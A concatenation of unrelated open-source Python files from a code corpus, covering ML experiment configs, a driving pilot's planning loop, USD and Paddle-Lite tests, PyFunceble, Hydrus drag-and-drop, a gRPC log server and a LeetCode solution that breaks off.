#@help("Path to pre-trained model or shortcut name selected in the list: ...")
pretrained_name: str = None
#@help("The name of the task to train selected in the list: " + "".join(processors.keys()))
task_name: str = None
#@help("Pretrained config name or path if not the same as model_name")
config_name: str = ""
#@help("Pretrained tokenizer name or path if not the same as model_name")
tokenizer_name: str = ""
#@help("Where do you want to store the pre-trained models downloaded from s3")
cache_dir: str = ""
#@help("The maximum total input sequence length after tokenization. Sequences longer than this will be truncated sequences shorter will be padded.")
max_seq_length: int = 128
#@help("Whether to run training.")
do_train: bool = False
#@help("Whether to run eval on the dev set.")
do_eval: bool = False
#@help("Rul evaluation during training at each logging step.")
evaluate_during_training: bool = False
#@help("Batch size per GPU/CPU for training.")
per_gpu_train_batch_size: int = 8
#@help("Batch size per GPU/CPU for evaluation.")
per_gpu_eval_batch_size: int = 8
#@help("Number of updates steps to accumulate before performing a backward/update pass.")
gradient_accumulation_steps: int = 1
#@help("The initial learning rate for Adam.")
learning_rate: float = 5e-5
#@help("Weight deay if we apply some.")
weight_decay: float = 0.0
#@help("Epsilon for Adam optimizer.")
adam_epsilon: float = 1e-8
#@help("Max gradient norm.")
max_grad_norm: float = 1.0
#@help("Total number of training epochs to perform.")
num_train_epochs: float = 3.0
#@help("If > 0: set total number of training steps to perform. Override num_train_epochs.")
max_steps: int = -1
#@help("Linear warmup over warmup_steps.")
warmup_steps: int = 0
#@help("Log every X updates steps.")
logging_steps: int = 10
#@help("Save checkpoint every X updates steps.")
save_steps: int = 50
#@help("Evaluate all checkpoints starting with the same prefix as model_name ending and ending with step number")
eval_all_checkpoints: bool = False
#@help("Avoid using CUDA when available")
no_cuda: bool = False
#@help("Overwrite the cached training and evaluation sets")
overwrite_cache: bool = False
#@help("random seed for initialization")
seed: int = 42
#@help("Whether to run on the TPU defined in the environment variables")
tpu: bool = False
#@help("TPU IP address if none are set in the environment variables")
tpu_ip_address: str = ''
#@help("TPU name if none are set in the environment variables")
tpu_name: str = ''
#@help("XRT TPU config if none are set in the environment variables")
xrt_tpu_config: str = ''
#@help("Whether to use 16-bit (mixed) precision (through NVIDIA apex) instead of 32-bit")
fp16: bool = False
#@help("For fp16: Apex AMP optimization level selected in ['O0', 'O1', 'O2' and 'O3']. See details at https://nvidia.github.io/apex/amp.html")
fp16_opt_level: str = 'O1'
#@help("For distributed training: local_rank")
local_rank: int = -1
#@help("For distant debugging.")
server_ip: str = ''
#@help("For distant debugging.")
server_port: str = ''
seed: int = 42
# Unused
#@help("The input data dir. Should contain the .tsv files (or other data files) for the task.")
data_dir: str = "/tmp/data"
#@help("The output directory where the model predictions and checkpoints will be written.")
output_dir: str = "/tmp/tmp_output_dir"
#@help("Overwrite the content of the output directory")
overwrite_output_dir: bool = True
def __post_init__(self):
if os.path.exists(self.output_dir) and os.listdir(
self.output_dir) and self.do_train and not self.overwrite_output_dir:
raise ValueError(
"Output directory ({}) already exists and is not empty. Use --overwrite_output_dir to overcome.".format(
self.output_dir))
# Setup distant debugging if needed
if self.server_ip and self.server_port:
# Distant debugging - see https://code.visualstudio.com/docs/python/debugging#_attach-to-a-local-script
import ptvsd
print("Waiting for debugger attach")
ptvsd.enable_attach(address=(self.server_ip, self.server_port), redirect_output=True)
ptvsd.wait_for_attach()
# Setup CUDA, GPU & distributed training
if self.local_rank == -1 or self.no_cuda:
device = torch.device("cuda" if torch.cuda.is_available() and not self.no_cuda else "cpu")
self.n_gpu = torch.cuda.device_count()
else: # Initializes the distributed backend which will take care of sychronizing nodes/GPUs
torch.cuda.set_device(self.local_rank)
device = torch.device("cuda", self.local_rank)
torch.distributed.init_process_group(backend='nccl')
self.n_gpu = 1
self.device = device
self.output_mode = "classification"
self.train_batch_size = self.per_gpu_train_batch_size * max(1, self.n_gpu)
self.eval_batch_size = self.per_gpu_eval_batch_size * max(1, self.n_gpu)
self._tokenizer = None
self._model = None
self._data_cache = None
self.train_started = None
@property
def tokenizer(self):
if self._tokenizer is None:
self._tokenizer = AutoTokenizer.from_pretrained(self.pretrained_name)
return self._tokenizer
@property
def experiment_name(self):
from datetime import datetime
import socket
if not self.name:
now = datetime.now()
d = now.strftime("%y%m%d_%H%M%S")
h = "_".join(socket.gethostname().split('-'))
def short_name(name):
return "".join([p[0] for p in name.split('_')])
def short_val(val):
if isinstance(val, bool):
return int(val)
return val
relevant_params = {k: v for k, v in dataclasses.asdict(self).items()
if not k.startswith('_') and hasattr(TransfoExperiment, k) and getattr(TransfoExperiment,
k) != v}
params = [f"{short_name(k)}_{v}" for k, v in relevant_params.items() if not isinstance(v, bool)]
bool_flags = [f"{short_name(k)}" for k, v in relevant_params.items() if isinstance(v, bool) and v]
params_str = ".".join(params + bool_flags)
self.name = f"{d}.{h}.{params_str}"
return self.name
def get_summary_writer(self):
return SummaryWriter("runs/"+self.experiment_name)
def _save_predictions(self, path):
self._dump_pickle([self._preds, self._phases], path)
def _load_predictions(self, path):
self._preds, self._phases = self._load_pickle(path)
return self._preds
def load_predictions(self):
path = self._path.parent / f"{self._path.stem}.preds"
return self._load_predictions(path)
# todo: make it compatible with Experiment
def get_trained_model(self, data: TransfoDatabunch):
self._model = self.train_model(data)
self.has_model = True
return self._model
def get_glue_databunch(self):
return TransfoDatabunch(
train_ds = prepare_glue_examples(self.tokenizer, self.task_name, 'train'),
valid_ds = prepare_glue_examples(self.tokenizer, self.task_name, 'validation'),
test_ds = None
)
def get_databunch(self, train_df, valid_df, test_df):
data_key = (id(train_df), id(valid_df), id(test_df))
if self._data_cache is not None and self._data_cache.key != data_key:
self._data_cache = None
self.tokenizer.max_len = 999999
if self._data_cache is None:
common_args = dict(text_a=self.text_a, text_b=self.text_b, label=self.label)
train_ds, label_list = convert_df_to_dataset(self.tokenizer, train_df, return_labels=True, **common_args)
data = TransfoDatabunch(
num_labels=len(label_list),
train_ds=train_ds,
valid_ds=convert_df_to_dataset(self.tokenizer, valid_df, **common_args),
test_ds=convert_df_to_dataset(self.tokenizer, test_df, **common_args)
)
data.key = data_key
self._data_cache = data
return self._data_cache
def new_experiment(self, **kwargs):
#kwargs.setdefault("has_predictions", False)
return super().new_experiment(**kwargs)
def _add_phase(self, state):
del state['opt']
del state['train_dl']
self._phases.append(state)
def set_seed(self, name):
return set_seed(self.seed, name, all_gpus=(self.n_gpu > 1))
# todo: make it compatible with Experiment
def train_model(self, data: TransfoDatabunch):
self.set_seed("class")
self.train_started = time.time()
num_labels = data.num_labels
config = AutoConfig.from_pretrained(self.pretrained_name, num_labels=num_labels) #, finetuning_task=args.task_name
model = AutoModelForSequenceClassification.from_pretrained(self.pretrained_name, config=config)
train(self, data.train_ds, data.valid_ds, model.to(self.device), self._tokenizer)
model.to("cpu")
return model
def _save_model(self, path):
model_to_save = self._model.module if hasattr(self._model,
'module') else self._model # Take care of distributed/parallel training
model_to_save.save_pretrained(path)
logger.info("Saving model checkpoint to %s", path)
# todo: move to Experiment
def save(self, dir_path):
dir_path = Path(dir_path)
dir_path.mkdir(exist_ok=True, parents=True)
filename = self._get_next_exp_name(dir_path)
j = dataclasses.asdict(self)
with open(filename, "wt") as f:
json.dump(j, f)
self._save_model(dir_path / f"{filename.stem}.model")
if hasattr(self, "_preds"):
self._save_predictions(dir_path / f"{filename.stem}.preds")
return filename.name
def evaluate_transformers(self, data):
return evaluate(self, self._model.to(self.device), data.valid_ds, prefix="")
def evaluate(self, model, train_df, valid_df, test_df):
data = self.get_databunch(train_df, valid_df, test_df)
valid_probs = get_preds(self, model, data.valid_ds, ordered=True)[0].cpu().numpy()
test_probs = get_preds(self, model, data.test_ds, ordered=True)[0].cpu().numpy()
train_probs = get_preds(self, model, data.train_ds, ordered=True)[0].cpu().numpy()
self._preds = []
for prefix, tdf, probs in zip(["train", "valid", "test"],
[train_df, valid_df, test_df],
[train_probs, valid_probs, test_probs]):
preds = np.argmax(probs, axis=1)
if self.merge_fragments and self.merge_type != "concat":
if self.merge_type == "vote_maj":
vote_results = preds_for_cell_content(tdf, probs)
elif self.merge_type == "vote_avg":
vote_results = preds_for_cell_content_multi(tdf, probs)
elif self.merge_type == "vote_max":
vote_results = preds_for_cell_content_max(tdf, probs)
preds = vote_results["pred"]
true_y = vote_results["true"]
else:
true_y = tdf["label"]
print(true_y.shape)
self._set_results(prefix, preds, true_y)
self._preds.append(probs)
# # schedule: Tuple = (
# # (1, 1e-2), # (a,b) -> fit_one_cyclce(a, b)
# # (1, 5e-3/2., 5e-3), # (a, b) -> freeze_to(-2); fit_one_cycle(a, b)
# # (8, 2e-3/100, 2e-3) # (a, b) -> unfreeze(); fit_one_cyccle(a, b)
# # )
# # # drop_mult: float = 0.75
# # fp16: bool = False
# pretrained_lm: str = "bert_base_cased"
# # dataset: str = None
# # train_on_easy: bool = True
# # BS: int = 64
# #
# # has_predictions: bool = False # similar to has_model, but to avoid storing pretrained models we only keep predictions
# # # that can be later used by CRF
class MnliProcessor(DataProcessor):
"""Processor for the MultiNLI data set (GLUE version)."""
def get_example_from_tensor_dict(self, tensor_dict):
"""See base class."""
return InputExample(tensor_dict['idx'].numpy(),
tensor_dict['premise'].numpy().decode('utf-8'),
tensor_dict['hypothesis'].numpy().decode('utf-8'),
str(tensor_dict['label'].numpy()))
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_tsv(os.path.join(data_dir, "dev_matched.tsv")),
"dev_matched")
def get_labels(self):
"""See base class."""
return ["contradiction", "entailment", "neutral"]
def _create_examples(self, lines, set_type):
"""Creates examples for the training and dev sets."""
examples = []
for (i, line) in enumerate(lines):
if i == 0:
continue
guid = "%s-%s" % (set_type, line[0])
text_a = line[8]
text_b = line[9]
label = line[-1]
examples.append(
InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))
return examples
|
pilot/planning/mp_planning.py | yanbarurobotics/PythonPilot | 129 | 12745723 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import multiprocessing
import numpy as np
import time
from common.pilot_gloval_variable import MPVariable
from planning import pure_pursuit
class MPPlanning():
def __init__(self, cfg):
self.__m = multiprocessing.Process(target=self.__process, \
args=(cfg['planning_interval'],))
self.__m.start()
return
def end(self):
self.__m.join()
print('Finish MPPerception')
return
def __process(self, interval):
"""
update planning
"""
try:
previos_work_time = time.time()
while True:
now_time = time.time()
if (now_time - previos_work_time) >= interval:
# calc target angle
target_z, \
target_angle = pure_pursuit.pure_pursuit(MPVariable.lane_m_leasts_abc_lpf_a.value, \
MPVariable.lane_m_leasts_abc_lpf_b.value, \
MPVariable.lane_m_leasts_abc_lpf_c.value, \
MPVariable.obd_vehicle_speed_kmph.value)
# tx update
MPVariable.pp_target_z.value = target_z
MPVariable.can_tx_target_angle.value = target_angle
MPVariable.can_tx_servo_on_flag.value = MPVariable.lane_m_leasts_status.value
MPVariable.can_tx_counter_camera_unit.value = MPVariable.can_rx_counter_servo_unit.value
previos_work_time = now_time
except KeyboardInterrupt:
pass
except Exception as e:
import traceback
traceback.print_exc()
finally:
pass
return
|
dizoo/procgen/maze/entry/__init__.py | sailxjx/DI-engine | 464 | 12745731 | from .maze_ppo_config import main_config, create_config
from .maze_dqn_config import main_config, create_config |
pxr/usd/pcp/testenv/testPcpStreamingLayerReload.py | stephenp24/USD | 3,680 | 12745742 | #!/pxrpythonsubst
#
# Copyright 2021 Pixar
#
# Licensed under the Apache License, Version 2.0 (the "Apache License")
# with the following modification; you may not use this file except in
# compliance with the Apache License and the following modification to it:
# Section 6. Trademarks. is deleted and replaced with:
#
# 6. Trademarks. This License does not grant permission to use the trade
# names, trademarks, service marks, or product names of the Licensor
# and its affiliates, except as required to comply with Section 4(c) of
# the License and to reproduce the content of the NOTICE file.
#
# You may obtain a copy of the Apache License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the Apache License with the above modification is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the Apache License for the specific
# language governing permissions and limitations under the Apache License.
from __future__ import print_function
from pxr import Sdf, Pcp, Plug, Vt
import os, unittest
class TestPcpStreamingLayerReload(unittest.TestCase):
@classmethod
def setUpClass(cls):
testRoot = os.path.join(os.path.dirname(__file__), 'PcpPlugins')
testPluginsDso = testRoot + '/lib'
testPluginsDsoSearch = testPluginsDso + '/*/Resources/'
# Register dso plugins. Discard possible exception due to
# TestPlugDsoEmpty. The exception only shows up here if it happens in
# the main thread so we can't rely on it.
try:
Plug.Registry().RegisterPlugins(testPluginsDsoSearch)
except RuntimeError:
pass
def setUp(self):
# We expect there to be no layers left loaded when we start each test
# case so we can start fresh. By the tearDown completes this needs to
# be true.
self.assertFalse(Sdf.Layer.GetLoadedLayers())
def _CreatePcpCache(self, rootLayer):
return Pcp.Cache(Pcp.LayerStackIdentifier(rootLayer))
def test_StreamingLayerReload(self):
# Open a layer with our streaming format.
l = Sdf.Layer.FindOrOpen('root.testpcpstreaminglayerreload')
self.assertTrue(l)
# Build a cache.
cache = self._CreatePcpCache(l)
# Attempt to compute an index for /torus1/mesh_0 (should not exist).
primIndex, errors = cache.ComputePrimIndex('/torus1/mesh_0')
self.assertEqual(primIndex.primStack, [])
# Load up asset.sdf, and replace l's content with it. This only changes
# the sublayer list, which pcp should recognize and blow layer stacks.
# Since l's underlying data implementation returns true for
# "StreamsData()" this exercises a different code-path in Pcp's change
# processing.
assetLayer = Sdf.Layer.FindOrOpen('asset.sdf')
self.assertTrue(assetLayer)
with Pcp._TestChangeProcessor(cache):
l.TransferContent(assetLayer)
# Now when we compute the index for the mesh, it should have a spec, due
# to the added sublayer.
primIndex, errors = cache.ComputePrimIndex('/torus1/mesh_0')
self.assertTrue(len(primIndex.primStack) > 0)
if __name__ == "__main__":
unittest.main()
|
PyFunceble/cli/migrators/csv_file/base.py | Centaurioun/PyFunceble | 213 | 12745746 | """
The tool to check the availability or syntax of domain, IP or URL.
::
██████╗ ██╗ ██╗███████╗██╗ ██╗███╗ ██╗ ██████╗███████╗██████╗ ██╗ ███████╗
██╔══██╗╚██╗ ██╔╝██╔════╝██║ ██║████╗ ██║██╔════╝██╔════╝██╔══██╗██║ ██╔════╝
██████╔╝ ╚████╔╝ █████╗ ██║ ██║██╔██╗ ██║██║ █████╗ ██████╔╝██║ █████╗
██╔═══╝ ╚██╔╝ ██╔══╝ ██║ ██║██║╚██╗██║██║ ██╔══╝ ██╔══██╗██║ ██╔══╝
██║ ██║ ██║ ╚██████╔╝██║ ╚████║╚██████╗███████╗██████╔╝███████╗███████╗
╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═════╝╚══════╝╚═════╝ ╚══════╝╚══════╝
Provides the base of all CSV file-s migrators.
Author:
<NAME>, @funilrys, contactTATAfunilrysTODTODcom
Special thanks:
https://pyfunceble.github.io/#/special-thanks
Contributors:
https://pyfunceble.github.io/#/contributors
Project link:
https://github.com/funilrys/PyFunceble
Project documentation:
https://pyfunceble.readthedocs.io/en/dev/
Project homepage:
https://pyfunceble.github.io/
License:
::
Copyright 2017, 2018, 2019, 2020, 2021 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import csv
import functools
import tempfile
from typing import List, Optional
import PyFunceble.facility
from PyFunceble.cli.migrators.base import MigratorBase
from PyFunceble.cli.utils.stdout import print_single_line
from PyFunceble.helpers.file import FileHelper
class CSVFileMigratorBase(MigratorBase):
"""
Provides the base of all CSV file migrator classes.
"""
source_file: Optional[str] = None
FIELDS: Optional[List[str]] = None
TO_DELETE: Optional[List[str]] = None
def ensure_source_file_is_given(func): # pylint: disable=no-self-argument
"""
Ensures that the source file is given before launching the decorated
method.
:raise RuntimeError:
When the:code:`self.source_file` is not given.
"""
@functools.wraps(func)
def wrapper(self, *args, **kwargs):
if not isinstance(self.source_file, str):
raise RuntimeError("<self.source_file> is not given.")
return func(self, *args, **kwargs) # pylint: disable=not-callable
return wrapper
@ensure_source_file_is_given
def migrate(self) -> "MigratorBase":
"""
Provides the migrator (itself).
"""
file_helper = FileHelper(self.source_file)
if file_helper.exists():
with file_helper.open("r", encoding="utf-8") as file_stream:
first_line = next(file_stream)
if any(x in first_line for x in self.TO_DELETE):
temp_destination = tempfile.NamedTemporaryFile(
"a+", newline="", encoding="utf-8", delete=False
)
file_handler = file_helper.open(newline="")
reader = csv.DictReader(file_handler)
writer = csv.DictWriter(
temp_destination,
fieldnames=[x for x in self.FIELDS if x not in self.TO_DELETE],
)
writer.writeheader()
keys_found = False
for row in reader:
row = dict(row)
for key in self.TO_DELETE:
if key in row:
del row[key]
keys_found = True
if not keys_found:
break
writer.writerow(row)
if self.print_action_to_stdout:
print_single_line()
temp_destination.seek(0)
FileHelper(temp_destination.name).move(self.source_file)
self.done = True
def start(self) -> "MigratorBase":
"""
Starts the migration and everything related to it.
"""
PyFunceble.facility.Logger.info("Started migration.")
self.migrate()
PyFunceble.facility.Logger.info("Finished migration.")
return self
|
tools/pot/openvino/tools/pot/configs/utils.py | pazamelin/openvino | 2,406 | 12745752 | <filename>tools/pot/openvino/tools/pot/configs/utils.py<gh_stars>1000+
# Copyright (C) 2020-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import itertools
from ..utils.logger import get_logger
logger = get_logger(__name__)
def product_dict(d):
keys = d.keys()
vals = d.values()
for instance in itertools.product(*vals):
yield dict(zip(keys, instance))
def check_params(algo_name, config, supported_params):
""" Check algorithm parameters in config
:param algo_name: name of algorithm
:param config: config with parameters to check
:param supported_params: parameters supported by algorithm
"""
for key, value in config.items():
if key not in supported_params:
raise RuntimeError('Algorithm {}. Unknown parameter: {}'.format(algo_name, key))
if isinstance(value, dict):
if isinstance(supported_params[key], dict):
check_params(algo_name, value, supported_params[key])
else:
raise RuntimeError('Algorithm {}. Wrong structure for parameter: {}'.format(algo_name, key))
|
hydrus/client/gui/ClientGUIDragDrop.py | thatfuckingbird/hydrus-websocket-server | 1,417 | 12745758 | import os
from qtpy import QtCore as QC
from qtpy import QtGui as QG
from qtpy import QtWidgets as QW
from hydrus.core import HydrusConstants as HC
from hydrus.core import HydrusGlobals as HG
from hydrus.core import HydrusPaths
from hydrus.core import HydrusText
from hydrus.client import ClientExporting
from hydrus.client.gui import ClientGUIFunctions
from hydrus.client.gui import QtPorting as QP
# we do this because some programs like discord will disallow exports with additional custom mimetypes (like 'application/hydrus-files')
# as this is only ever an internal transfer, and as the python mimedata object is preserved through the dnd, we can just tack this info on with a subclass and python variables
class QMimeDataHydrusFiles( QC.QMimeData ):
def __init__( self ):
QC.QMimeData.__init__( self )
self._hydrus_files = None
def hydrusFiles( self ):
return self._hydrus_files
def setHydrusFiles( self, page_key, hashes ):
self._hydrus_files = ( page_key, hashes )
def DoFileExportDragDrop( window, page_key, media, alt_down ):
drop_source = QG.QDrag( window )
data_object = QMimeDataHydrusFiles()
#
new_options = HG.client_controller.new_options
do_secret_discord_dnd_fix = new_options.GetBoolean( 'secret_discord_dnd_fix' ) and alt_down
#
client_files_manager = HG.client_controller.client_files_manager
original_paths = []
media_and_original_paths = []
total_size = 0
for m in media:
hash = m.GetHash()
mime = m.GetMime()
total_size += m.GetSize()
original_path = client_files_manager.GetFilePath( hash, mime, check_file_exists = False )
original_paths.append( original_path )
media_and_original_paths.append( ( m, original_path ) )
#
discord_dnd_fix_possible = new_options.GetBoolean( 'discord_dnd_fix' ) and len( original_paths ) <= 50 and total_size < 200 * 1048576
temp_dir = HG.client_controller.temp_dir
if do_secret_discord_dnd_fix:
dnd_paths = original_paths
flags = QC.Qt.MoveAction
elif discord_dnd_fix_possible and os.path.exists( temp_dir ):
fallback_filename_terms = ClientExporting.ParseExportPhrase( '{hash}' )
try:
filename_pattern = new_options.GetString( 'discord_dnd_filename_pattern' )
filename_terms = ClientExporting.ParseExportPhrase( filename_pattern )
if len( filename_terms ) == 0:
raise Exception()
except:
filename_terms = fallback_filename_terms
dnd_paths = []
for ( m, original_path ) in media_and_original_paths:
filename = ClientExporting.GenerateExportFilename( temp_dir, m, filename_terms )
if filename == HC.mime_ext_lookup[ m.GetMime() ]:
filename = ClientExporting.GenerateExportFilename( temp_dir, m, fallback_filename_terms )
dnd_path = os.path.join( temp_dir, filename )
if not os.path.exists( dnd_path ):
HydrusPaths.MirrorFile( original_path, dnd_path )
dnd_paths.append( dnd_path )
flags = QC.Qt.MoveAction | QC.Qt.CopyAction
else:
dnd_paths = original_paths
flags = QC.Qt.CopyAction
uri_list = []
for path in dnd_paths:
uri_list.append( QC.QUrl.fromLocalFile( path ) )
data_object.setUrls( uri_list )
#
hashes = [ m.GetHash() for m in media ]
data_object.setHydrusFiles( page_key, hashes )
# old way of doing this that makes some external programs (discord) reject it
'''
if page_key is None:
encoded_page_key = None
else:
encoded_page_key = page_key.hex()
data_obj = ( encoded_page_key, [ hash.hex() for hash in hashes ] )
data_str = json.dumps( data_obj )
data_bytes = bytes( data_str, 'utf-8' )
data_object.setData( 'application/hydrus-media', data_bytes )
'''
#
drop_source.setMimeData( data_object )
result = drop_source.exec_( flags, QC.Qt.CopyAction )
return result
class FileDropTarget( QC.QObject ):
def __init__( self, parent, filenames_callable = None, url_callable = None, media_callable = None ):
QC.QObject.__init__( self, parent )
self._parent = parent
if parent:
parent.setAcceptDrops( True )
self._filenames_callable = filenames_callable
self._url_callable = url_callable
self._media_callable = media_callable
def eventFilter( self, object, event ):
if event.type() == QC.QEvent.Drop:
if self.OnDrop( event.pos().x(), event.pos().y() ):
event.setDropAction( self.OnData( event.mimeData(), event.proposedAction() ) )
event.accept()
elif event.type() == QC.QEvent.DragEnter:
event.accept()
return False
def OnData( self, mime_data, result ):
media_dnd = isinstance( mime_data, QMimeDataHydrusFiles )
urls_dnd = mime_data.hasUrls()
text_dnd = mime_data.hasText()
if media_dnd and self._media_callable is not None:
result = mime_data.hydrusFiles()
if result is not None:
( page_key, hashes ) = result
if page_key is not None:
QP.CallAfter( self._media_callable, page_key, hashes ) # callafter so we can terminate dnd event now
result = QC.Qt.MoveAction
# old way of doing it that messed up discord et al
'''
elif mime_data.formats().count( 'application/hydrus-media' ) and self._media_callable is not None:
mview = mime_data.data( 'application/hydrus-media' )
data_bytes = mview.data()
data_str = str( data_bytes, 'utf-8' )
(encoded_page_key, encoded_hashes) = json.loads( data_str )
if encoded_page_key is not None:
page_key = bytes.fromhex( encoded_page_key )
hashes = [ bytes.fromhex( encoded_hash ) for encoded_hash in encoded_hashes ]
QP.CallAfter( self._media_callable, page_key, hashes ) # callafter so we can terminate dnd event now
result = QC.Qt.MoveAction
'''
elif urls_dnd or text_dnd:
paths = []
urls = []
if urls_dnd:
dnd_items = mime_data.urls()
for dnd_item in dnd_items:
if dnd_item.isLocalFile():
paths.append( os.path.normpath( dnd_item.toLocalFile() ) )
else:
urls.append( dnd_item.url() )
else:
text = mime_data.text()
text_lines = HydrusText.DeserialiseNewlinedTexts( text )
for text_line in text_lines:
if text_line.startswith( 'http' ):
urls.append( text_line )
# ignore 'paths'
if self._filenames_callable is not None:
if len( paths ) > 0:
QP.CallAfter( self._filenames_callable, paths ) # callafter to terminate dnd event now
if self._url_callable is not None:
if len( urls ) > 0:
for url in urls:
QP.CallAfter( self._url_callable, url ) # callafter to terminate dnd event now
result = QC.Qt.IgnoreAction
else:
result = QC.Qt.IgnoreAction
return result
def OnDrop( self, x, y ):
screen_position = ClientGUIFunctions.ClientToScreen( self._parent, QC.QPoint( x, y ) )
drop_tlw = QW.QApplication.topLevelAt( screen_position )
my_tlw = self._parent.window()
if drop_tlw == my_tlw:
return True
else:
return False
# setting OnDragOver to return copy gives Linux trouble with page tab drops with shift held down
|
malib/rpc/log/log_server.py | zbzhu99/malib | 258 | 12745770 | <reponame>zbzhu99/malib<filename>malib/rpc/log/log_server.py<gh_stars>100-1000
import time
import grpc
from threading import Event
from concurrent import futures
from collections import Iterable
from malib.rpc.proto import log_pb2_grpc, log_pb2
from malib.utils import io_wrapper
from malib.utils.convert import utc_to_str, dump_dict
from malib.utils.io_wrapper import BaseIOWrapper, StandardIOWrapper
class LogServicer(log_pb2_grpc.LogRPCServicer):
def __init__(self, timeout=-1, ioers=None):
super().__init__()
self.timeout = timeout
self.ioers = []
if isinstance(ioers, Iterable):
for i in ioers:
assert isinstance(i, BaseIOWrapper)
self.ioers.append(i)
elif ioers is not None:
assert isinstance(ioers, BaseIOWrapper)
self.ioers.append(ioers)
else:
self.ioers.append(StandardIOWrapper())
self.alivetime = time.time()
def Log(self, info, context):
status = 0
target = None
try:
level = int(info.log_level)
msg = info.log_info
st = info.send_time
self.alivetime = time.time()
target = {
"ReceiveTime": time.time(),
"SendTime": st,
"Level": level,
"Content": msg,
}
except:
status = -1
target = {
"ReceiveTime": time.time(),
"SendTime": "N/A",
"Level": "N/A",
"Content": "Error",
}
for i in self.ioers:
i.write("LoggerServer: " + dump_dict(target))
return log_pb2.LogReply(status_code=str(status), send_time=time.time())
# def stop(self):
# for i in self.ioers:
# i.write('LoggerServer: Calling server stop')
class LoggerServer:
def __init__(self, port, io_wrappers=None, grace=5, max_workers=10):
self.port = port
self.grace = grace
self.server = grpc.server(futures.ThreadPoolExecutor(max_workers=max_workers))
self.io_wrappers = io_wrappers
log_pb2_grpc.add_LogRPCServicer_to_server(
LogServicer(ioers=io_wrappers), self.server
)
self.server.add_insecure_port(port)
def start(self):
self.server.start()
def stop(self):
for i in self.io_wrappers:
i.write("LoggerServer: Calling server stop")
self.server.stop(grace=self.grace)
def serve(port):
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
log_pb2_grpc.add_LogRPCServicer_to_server(LogServicer(), server)
server.add_insecure_port(port)
server.start()
server.wait_for_termination()
|
lite/tests/unittest_py/pass/common/test_elementwise_scale_fuse_pass_base.py | 714627034/Paddle-Lite | 808 | 12745807 | <reponame>714627034/Paddle-Lite<gh_stars>100-1000
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.append('..')
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import numpy as np
from functools import partial
from typing import Optional, List, Callable, Dict, Any, Set
import unittest
import hypothesis
from hypothesis import given, settings, seed, example, assume, reproduce_failure
import hypothesis.strategies as st
def sample_program_configs(draw):
#elementwise param
in_shape_x = draw(
st.lists(
st.integers(
min_value=1, max_value=20), min_size=4, max_size=4))
in_shape_y = draw(
st.lists(
st.integers(
min_value=1, max_value=20), min_size=4, max_size=4))
assume((in_shape_x[0] == in_shape_y[0] or in_shape_x[0] == 1 or
in_shape_y[0] == 1) and (in_shape_x[0] >= in_shape_y[0]))
assume((in_shape_x[1] == in_shape_y[1] or in_shape_x[1] == 1 or
in_shape_y[1] == 1) and (in_shape_x[1] >= in_shape_y[1]))
assume((in_shape_x[2] == in_shape_y[2] or in_shape_x[2] == 1 or
in_shape_y[2] == 1) and (in_shape_x[2] >= in_shape_y[2]))
assume((in_shape_x[3] == in_shape_y[3] or in_shape_x[3] == 1 or
in_shape_y[3] == 1) and (in_shape_x[3] >= in_shape_y[3]))
axis = -1
#scale param
scale = draw(st.floats(min_value=0.5, max_value=5))
bias = draw(st.floats(min_value=0, max_value=1))
alpha = draw(st.floats(min_value=0, max_value=1))
bias_after_scale = draw(st.sampled_from([False, True]))
elementwise_op = OpConfig(
type='elementwise_mul',
inputs={"X": ["input_data_x"],
"Y": ["input_data_y"]},
outputs={"Out": ["elementwise_output_data"]},
attrs={"data_format": 'nchw',
"axis": axis})
scale_op = OpConfig(
type='scale',
inputs={"X": ["elementwise_output_data"]},
outputs={"Out": ["output_data"]},
attrs={
"scale": scale,
"bias": bias,
"alpha": alpha,
"bias_after_scale": bias_after_scale
})
ops = [elementwise_op, scale_op]
program_config = ProgramConfig(
ops=ops,
weights={},
inputs={
"input_data_x": TensorConfig(shape=in_shape_x),
"input_data_y": TensorConfig(shape=in_shape_y)
},
outputs=["output_data"])
return program_config
|
Python3/1284.py | rakhi2001/ecom7 | 854 | 12745817 | <gh_stars>100-1000
__________________________________________________________________________________________________
sample 16 ms submission
class Solution:
def minFlips(self, mat: List[List[int]]) -> int:
M, N = len(mat), len(mat[0])
res = float('inf')
dire = [(0,0),(1,0),(-1,0),(0,1),(0,-1)]
def turn(x,y):
for d in dire:
a, b = x + d[0], y + d[1]
if 0 <= a < M and 0 <= b < N:
mat[a][b] ^= 1
#all states of row 0
for k in range(1 << N):
cnt = 0
backup = [[xx for xx in yy] for yy in mat]
for j in range(N):
if k >> j & 1:
cnt += 1
turn(0,j)
for i in range(M - 1):
for j in range(N):
if mat[i][j] == 1:
cnt += 1
turn(i + 1, j)
is_successful = True
for j in range(N):
if mat[M - 1][j] == 1:
is_successful = False
break
if is_successful:
res = min(res,cnt)
mat = [[xx for xx in yy] for yy in backup]
return -1 if res == float('inf') else res
__________________________________________________________________________________________________
sample 20 ms submission
import functools
import itertools
class Solution:
@staticmethod
def minFlips(mat: List[List[int]]) -> int:
